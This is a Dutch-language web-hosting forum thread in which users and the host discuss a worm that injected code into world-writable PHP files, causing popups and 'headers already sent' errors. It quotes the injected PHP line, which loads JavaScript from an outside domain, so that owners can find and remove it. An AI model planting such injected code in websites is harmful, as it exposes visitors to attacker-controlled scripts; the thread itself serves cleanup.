Kan iemand me uitleggen wat er nu precies gaande is ?
Ik kan me gastenboek neit beheren en kan ook niet in me chatbox,
En ik had gezen dat er iets van log-in was geblokeert voor veiligheid
is dat het of is er gewoon iets verwijdert ?
en waarom zou me forum dan wel werken? En als jullie die inlog tijdelijk hebbe uitgezet ofzo wanneer is alles dan weer normaal ?
alvast bedankt 
| Quote: |
It seems like a worm/hacker is currently trying to hack/deface websites on server 2, mostly when directories/files are chmod to 777. Most of the time the following code is added to the files:
| Code: | <? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>
|
If you have problems with your website, get popups or "header already sent out" error, please look for this code in the source code of the php files in question and remove it.
|
staat er bij het nieuws
het kan dus zijn dat de rechten zijn gewijzigd naar 777(iedereen alle rechten)
en dat der een stukje script in jouw site is geplaatst..
als je dit tegenkomt dan moet je die even verwijderen...
ik heb zelf nergens last van.. als je het zekers wilt weten dan zou ik alle paginas verwijderen en ff opnieuw uploaden.. dan zou alles weer goed moeten zijnverwijder dat stukje code en alles is ok 
Die scribt staat er bij mij neit in het is namelijk een php chat en al die bestanden zijn php dus het kan aan alles liggen 
| marocsite wrote: |
| Die scribt staat er bij mij neit in het is namelijk een php chat en al die bestanden zijn php dus het kan aan alles liggen |
Dan ligt het misschien aan iets anders. Over welke chatbox heb je het? Ik zal er eens naar kijken.Is er al geweten welke websites getroffen zijn door deze aanval?
Mijn forum is perfect toegankelijk, enkel mijn website zorgt ervoor dat mijn IE browser het laat afweten.
Waar ergens in mijn directadmin of FTP kan ik gaan kijken of deze codes voorkomen?
Ik hoop dat iemand mij in een verstaanbare taal kan uitleggen hoe ik eventueel deze zaken zou kunnen verwijderen.
Dit feit maakt zeer ongerust, maar ik heb alle vertrouwen in Bondings dat hij de hackers probeert voor te zijn.
Als het hem lukt, dan krijg je hierbij al een proficiat.
als je er helemaal zeker van wilt zijn moet je al je php bestanden openen en op zoek gaan naar de code die hierboven al genoemd is. En dan zou ik vooral kijken naar mappen waar chmod op 777 staat want als het goed is kan hij in andere mappen niks veranderen. De php bestanden kan je gewoon openen met kladblok en dan met de zoekfunctie op zoek naar de code.
Als je website niet meer werkt, je krijgt een "headers already sent out", een popup of de pagina redirect naar een andere website. Het valt wel op hoor, als je niets ziet, dan is er meer dan waarschijnlijk geen probleem. 
De meeste websites zijn niet aangetast. Ik heb het misschien niet duidelijk genoeg gemaakt, maar het is niet de server zelf die gehackt is of zo, maar de websites. 777 betekent toegankelijk voor iedereen (op de server) en als een hacker op één account op de server geraakt, kan hij gemakkelijk toegang hebben tot een heel aantal andere websites op de server.
Dit is een normale configuratie voor een server, daarom moet je zoveel mogelijk een 777 directory vermijden als je niet de enige user op een server bent.
Ik heb nu geprobeerd wat restricties te zetten op de toegang tot andere directories, maar ik kan niet garanderen dat het 100% werkt (er zijn altijd wel een paar gaatjes).
Een tweede ding is dat ik denk dat dit eerder een automatische en eenmalige aanval is door een worm, niet echt door een hacker of toch niet direct. Tip:
De Header Already Sent error:
| Code: |
| headers already sent by (output started at functions.php:3) in index.php on line 1 |
Waar zit nu het probleem? Kijk naar het bestand tussen de haakjes, hier dus functions.php op regel 3. Open dit bestand, kijk in regel 3 en waarschijnlijk staat daar dan die domainstat code. Verwijder hem en klaar is kees.
Ook, als je popupblocker uitstaat, opent er een popup als je een pagina opent.
Let op: Dit werkt alleen bij deze worm/hackaanval. Het kan ook aan andere dingen liggen. Mijn site had dit probleem, heb een backup terug gezet want in elk bestand stond het; ik heb gezien dat het ook in andere mappen het geval was dan 777.
Ik was toch van plan het forum opnieuw te uploaden, waardoor ik er amper last van had, al wil ik liever dat dit niet meer gebeurt 
daar had ik nog niet van gehoord van dit probleem. danku voor de tip.
Bij mij kwam de code niet alleen voor bij bestanden die CHMOD 777 hadden, maar ook bij CHMOD 666...
Bedankt voor de tip over de hacker! Ik heb net de halve dag zitten zoeken waar die pop-ups vandaan kwamen 
Volgende keer lees ik EERST het forum
Nu nog ff zoeken in welk php-script het zit...
JohanFH Ik heb nog geen problemen gehad en hopelijk blijft dat zo ook.
ah,
ik heb er niets van ondervonden
| deedee wrote: |
| Bij mij kwam de code niet alleen voor bij bestanden die CHMOD 777 hadden, maar ook bij CHMOD 666... |
Hmmm, misschien dat Bondings hier ook eens zou kunnen gaan kijken om het eventueel ook te "blokkeren"? | timerecords wrote: |
| deedee wrote: | | Bij mij kwam de code niet alleen voor bij bestanden die CHMOD 777 hadden, maar ook bij CHMOD 666... |
Hmmm, misschien dat Bondings hier ook eens zou kunnen gaan kijken om het eventueel ook te "blokkeren"? |
Wel ik heb toen nogal wat dingen verstrengd (wat ook voor problemen heeft gezorgd) en volgens mij zou iets gelijkaardigs niet meer kunnen/mogen gebeuren (toch niet op dezelfde manier).
